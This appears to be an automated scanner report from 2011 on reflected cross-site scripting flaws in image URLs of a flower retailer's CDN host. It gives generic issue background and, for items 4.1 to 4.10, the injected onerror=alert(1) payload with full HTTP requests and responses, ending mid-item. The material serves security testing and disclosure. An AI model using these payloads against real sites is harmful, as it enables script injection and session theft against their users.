rsi_segs_1000000=pUPF5ENBeXIMpzax3xDh/u74svh4rycdP0dAKlgosDQtsveKPUAbV6eJooUUZKyvzikWhXHnKlCMkZbB9/VH60YJGPxFnajuGncuM/dM/Uh51xPHRNkiKQlkFzeExmUiyCHp+JZor9oPRzZI0Mbu6KYqeA1IFSCpVac+IHlYHQGyWu5ISmDl59BKT6swEf9AkfwNDDGhkWPwbnVyhZyB1WbtdCNOgL1rLo31JmKhop80U9r9+w7gbPBUqdi6+aNOCntxXGEa0lT+AOh+9OmV2I5Yi+DkYM3YMd3xb2omk+SKbfwlcWpm1VDYZX6/5kh5fJXyQ0UuyTsjW0JuXe81b8+eIYhrcWsU5BhKZRNIMTtdY+xejMckEvxn9o2P/m3ieDJIm0I9cQrZSZNRQDVHBMxU2xxjy5ZGBdqmuzGNq9UM71skeHbQ22x5ql389tzqH5qIR0+2BtDJC3TVoXS7O5QjXrolunrjwuyTfiDVLYSK9FFxIlC9z+BchyFW97A0vl9EZfAu44kUi3twGM/yf01GWw==; rtc_0s-X=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_aQJL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_s48j="MLsXrqMOJjhv5pB0GuK8L0G3v0lm6Jub5RPOlOqTe4bwXJoZcq+UbnlmhOBhXf5iQTJk/quwLpxqtP9GqCKLRqJJAW3ERa9522Y3c+jzTLCbNefpygq1t8AuaMXzycfsvZZsXhu+Khv10rUO1cy3NXmzFcyYbPBb09aMYXjJ822e1Q7/ElwgfRLN3pn/1mAypzCMOG4b28tgIOtUWTBmulp5e6AfPHNlRMbSaoXKYkuSpZEvc1wOxDlyyn8xdJwOFk8g1XucIRlWrmaYiyVxIG+u3yBx/kt5blOfVSKJhfuza4GCvepswCgGc6U4nVJlLIh6c52snKpl9l/2Qebjzk11/ByzI7i8z1Zpr30Oa7IeNHp5P19QYgzDsyOSh+zPbYle82aztXJAb97XsuXpAThUS5Sz5idOic/xT3RQ2hhfdguGby2z59ngM+DIell5UMzqQYmh/CZhKCj1ZpQQvfz0bxxBSoyaveJ/ieowILIMymdszvD876DwGyxqXNoPEmN+iXp+1N/YdWjpPGkkDlStS5THRh1HTa8MJKmAROP5m4KLKBHb7VDAxdcDYcJ1WVcznBdRdf7bmpGxmbJyWmyedox3lcVJjZHTryFWuB+/AKHardLq+ZC8qA/dFaDCtG3lbOG2NUUhhKZJE/iKOwAtVxvE/uzMsIC9yQqy4zfhNonSsShjqzmLvmEa8qTSeMMnsgrjf5IID8HOPjlyiVfir4Np0rZG9c8l/bk29gzOTHWp0YkxR4oMjlqvWsndyKi1tg+hIMGhKagnbzYFNpm/spXNcN8qj8+89r3PzhUKkc1yFEXHQCoVGMA0tCowfcaGas0hBbm9or1oIURPOAUkjSXEAqxfbS3Ci++7gQjn3qifAD/5yK0DIlxHJH2Z/NIsGuCYkemULDpKPI9T5TnHzgQgaAVh1NBzpxvVNAQAEM/K5b0RudLduAqFoKYz8Dhe7QdDHKkftjM/FHcmr297NIfp8Qz7yEnxNk7uzarw8pvYwOFaDehW6Pc31JTK1tiBMhxKm2eTFSgN"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUM9IzlDOAYc1U1kNgyhQng1Be7z7sLKw1xd7M/G6n4G+PviQjXOwUXKLcB48iFx8crf5HGEfF0887Q+iy3epGgFRZvmgTn1Qcp+ICmLmBprGKXIekE7Jl4bGa9oQC5IaLHOyw/Br6Qj6IQuoNj5mfJvLHqNgmqX9PdDfXFrZEEA9wHOZJ0motkDFe/vAeaB5Xp/5EVLHgOk7O6boUcDvIMREIphiKzK1Chi6xHSKPQfHUA0w9NV/4Z6E9R/aSZzi+KuSrbSLVztAAxSiwXlvAQ65absewpdZoy+uIXZL0iV02cnknuLa9//+XnBHR0Gf6UCl6WonVLCctZrPSG7osK+6ibEZuxs1J5dOjkzv+lUChocqxKkS83YuK3zosM9HVRWCHO9ZTvAPBFuNGe2tkr1WkHLmhmgpoVMAM67ByzAUObHSWgMKEY5Sku1bUJzj1hRanuffQf640okMVZK9l8GX0X9lIk+lzCMzbcV0f92zKSQG3mEb7PrxNNEpGmsF2lk3+vEHFWQGR6wXjVVUjh2h2CyFg7zc0IbKw5AJ6SFaoAj3GsJkdKUg6jcwjxsFn10+PxBQ3eiHzmfZzg5wuWs0KzgnhRS0JVObI1U8uM4CvDyLdIPNRJZNTiaOElKtl/1hUqSmAG+vmw64AfdEHU9+3pcoVPrPRyKpRbNv/rPvs+fupyE6BxZpJRPvvcfwyDWGWB3bvNb3b1FHzh3JcOfVbJv84k6iSuL074poA9xrOIAe+nyjIMy1fqRo5xI8tq5NVTASv7fRGtdl681WgLTFW7zXyvocArwa2L0Wk38pQK38Sdh//PeH/nbICXmw2pRW36GSCcM5qoF1B0lkphF+UBgarQW3Vcl+i0jP/aa4q7QF5WScoYL7gcotuYpX4JI4uQ/Z+PFzM2jaN/mc1igfcIUNBvDj9ji1ZXfNRUtNZN9ggKYDKWcKI03XAeR2fOOyAIC5vFNjil49imrT9stNuCV9Y+kjENDfwsUD54quOzPiiUggHr/hIrULsX0lpf9f9j4/doOk0AdUME/uvUMx1QiGbMVQX3s9Jcq1Gsj/o7aJAfVA4qf/funtCsIYE6PIuKqE4XCJDVuHo5QSI97nWrx06n2wHknf0Qfbl+vvSv3mnv+t4JjaPb6e0QhUnPkUrg88uAXeNjfwGJWAP7ZQfUgB/WaDNDhyLWP/Yh3rCUCR8uHaCQI9sKWAVbPw6iO5kceIVQzUWPMVKTcRB5qOOGrh3S5d5Urf1tG13gpjjuJ3PUTSeA16Ot6LDFVi5mcIBL8J4aZnR3klIKAk6kSjHkyA9SaYV9G84MU6EkJCzKx8ihoJoi04bbStfFZ/yfYBAbahOI4r0ZmIncghLeaJISxxd4RdBaStFPe5yWkeMLSY5xmbMq/Bc1FtQn9uYzJCBg5XvCKLU5my9/plxSgMR4fiVWSX0IM7P/nfQsaJG6bZeBxB/bPB1a+MuzhK7j5W3SnHNaojJlAe5OtFr8pKFNrxmxL8VOF0PcdCWqH/IjrUOXMoeBySv2OxuNlxuo="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1274605&id=56918&id=315889&id=715901&id=1023315&id=725071&id=1268392&id=1198035&id=1049794&id=74560&id=593881&id=1264419&id=86237&id=926097&id=1006089&id=1196051&id=1086731&id=1284585&id=1086733&id=1044410&id=1093100&id=1063912&id=397181&id=1044578&id=1063916&id=1041270&id=1049769&id=1049770&id=596293&id=576685&id=596291&id=1044587&id=1049772&id=1063911&id=1063910&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:04:19 GMT

4. Cross-site scripting (reflected)  previous  next
There are 212 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1fc4e<img%20src%3da%20onerror%3dalert(1)>27c92c8ec6c was submitted in the REST URL parameter 9. This input was echoed as 1fc4e<img src=a onerror=alert(1)>27c92c8ec6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn1fc4e<img%20src%3da%20onerror%3dalert(1)>27c92c8ec6c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:33 GMT
Connection: close

Unable to find /ProvideCommerce/8inwoodtaper_tn1fc4e<img src=a onerror=alert(1)>27c92c8ec6c
4.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e86fb<img%20src%3da%20onerror%3dalert(1)>9d7791613a7 was submitted in the REST URL parameter 9. This input was echoed as e86fb<img src=a onerror=alert(1)>9d7791613a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tne86fb<img%20src%3da%20onerror%3dalert(1)>9d7791613a7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:32 GMT
Connection: close

Unable to find /ProvideCommerce/8inwvnbskt_tne86fb<img src=a onerror=alert(1)>9d7791613a7
4.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 532b2<img%20src%3da%20onerror%3dalert(1)>e8b79cc0d7f was submitted in the REST URL parameter 9. This input was echoed as 532b2<img src=a onerror=alert(1)>e8b79cc0d7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ532b2<img%20src%3da%20onerror%3dalert(1)>e8b79cc0d7f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/ACC_purpletrumpet_VA0211_11_SQ532b2<img src=a onerror=alert(1)>e8b79cc0d7f
4.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dc0ce<img%20src%3da%20onerror%3dalert(1)>2e0a0929579 was submitted in the REST URL parameter 9. This input was echoed as dc0ce<img src=a onerror=alert(1)>2e0a0929579 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_3months_PFdc0ce<img%20src%3da%20onerror%3dalert(1)>2e0a0929579?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:14 GMT
Connection: close

Unable to find /ProvideCommerce/BBMflowers09_3months_PFdc0ce<img src=a onerror=alert(1)>2e0a0929579
4.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3cd85<img%20src%3da%20onerror%3dalert(1)>293739f3d19 was submitted in the REST URL parameter 9. This input was echoed as 3cd85<img src=a onerror=alert(1)>293739f3d19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers09_6months_PF3cd85<img%20src%3da%20onerror%3dalert(1)>293739f3d19?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:14 GMT
Connection: close

Unable to find /ProvideCommerce/BBMflowers09_6months_PF3cd85<img src=a onerror=alert(1)>293739f3d19
4.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6e79d<img%20src%3da%20onerror%3dalert(1)>461165d53fe was submitted in the REST URL parameter 9. This input was echoed as 6e79d<img src=a onerror=alert(1)>461165d53fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMflowers_12monthsXMAS_PF6e79d<img%20src%3da%20onerror%3dalert(1)>461165d53fe?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:17 GMT
Connection: close

Unable to find /ProvideCommerce/BBMflowers_12monthsXMAS_PF6e79d<img src=a onerror=alert(1)>461165d53fe
4.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 8c050<img%20src%3da%20onerror%3dalert(1)>d2aadd692a9 was submitted in the REST URL parameter 9. This input was echoed as 8c050<img src=a onerror=alert(1)>d2aadd692a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF8c050<img%20src%3da%20onerror%3dalert(1)>d2aadd692a9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:04 GMT
Connection: close

Unable to find /ProvideCommerce/BBMplants09_12months_PF8c050<img src=a onerror=alert(1)>d2aadd692a9
4.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 219a4<img%20src%3da%20onerror%3dalert(1)>731292b4127 was submitted in the REST URL parameter 9. This input was echoed as 219a4<img src=a onerror=alert(1)>731292b4127 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF219a4<img%20src%3da%20onerror%3dalert(1)>731292b4127?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/BBMplants09_3months_PF219a4<img src=a onerror=alert(1)>731292b4127
4.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 42d6c<img%20src%3da%20onerror%3dalert(1)>7a0481f0a6 was submitted in the REST URL parameter 9. This input was echoed as 42d6c<img src=a onerror=alert(1)>7a0481f0a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF42d6c<img%20src%3da%20onerror%3dalert(1)>7a0481f0a6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:07 GMT
Connection: close

Unable to find /ProvideCommerce/BBMplants09_6months_PF42d6c<img src=a onerror=alert(1)>7a0481f0a6
4.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB6indaffodills_nestbskt10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload efcc5<img%20src%3da%20onerror%3dalert(1)>06385eca2 was submitted in the REST URL parameter 9. This input was echoed as efcc5<img src=a onerror=alert(1)>06385eca2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

